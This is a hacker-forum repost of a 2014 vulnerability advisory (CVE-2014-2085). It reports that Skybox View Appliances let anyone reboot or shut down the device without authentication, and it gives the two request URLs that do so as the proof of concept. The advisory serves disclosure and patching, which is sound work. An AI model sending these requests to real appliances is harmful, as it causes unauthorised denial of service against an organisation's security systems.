跳转到帖子

游客您好,欢迎来到黑客世界论坛!您可以在这里进行注册。

赤队小组-代号1949(原CHT攻防小组)在这个瞬息万变的网络时代,我们保持初心,创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识,您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告,请注册用户查看我们的使用与隐私策略,谢谢您的配合。小组成员可以获取论坛隐藏内容!

TheHackerWorld官方

Skybox Security 6.3.x < 6.4.x - Multiple Denial of Service Vulnerabilities

精选回复

发布于
# Exploit Title: [SKYBOX Security - DDOS]
 
# Date: [22-Jan-2014]
# Exploit Author: [Luigi Vezzoso]
# Vendor Homepage: [http://www.skyboxsecurity.com]
# Version: [Skybox View Appliances with ISO versions: 6.3.33-2.14, 
6.3.31-2.14, 6.4.42-2.54, 6.4.45-2.56, 6.4.46-2.57]
# Tested on: [Centos 6.4 kernel 2.6.32]
# CVE : [CVE-2014-2085]
 
#OVERVIEW
A vulnerability has been found in some Skybox View Appliances’ Admin 
interfaces which would allow a potential malicious party to bypass 
the authentication mechanism and execute reboot and/or shutdown of 
appliance self
 
#INTRODUCTION
Skybox Security has a complete portfolio of security management 
tools that deliver the security intelligence needed to act fast to 
minimize risks and eliminate attack vectors.  Based on a powerful 
risk analytics platform that links data from vulnerability scanners, 
threat intelligence feeds, firewalls and other network infrastructure 
devices – Skybox gives you context to prioritize risks accurately and 
automatically, in minutes.
 
#VULNERABILITY DESCRIPTION
It's possible to open and execute the reboot and shutdown script 
without autentication at the following links:
https://1.1.1.1:444/scripts/commands/reboot?_=1111111111
https://1.1.1.1:444/scripts/commands/shutdown?_=1111111111
#VERSIONS AFFECTED
Skybox View Appliances with ISO versions: 6.3.33-2.14, 6.3.31-2.14, 
6.4.42-2.54, 6.4.45-2.56, 6.4.46-2.57
 
#SOLUTION
Please refer to the vendor security advisor: Security Advisory 2014-
3-25-1
 
#CREDITS
Luigi Vezzoso 
email:  [email protected]
skype:  luigivezzoso
            

创建帐户或登录后发表意见

最近浏览 0

  • 没有会员查看此页面。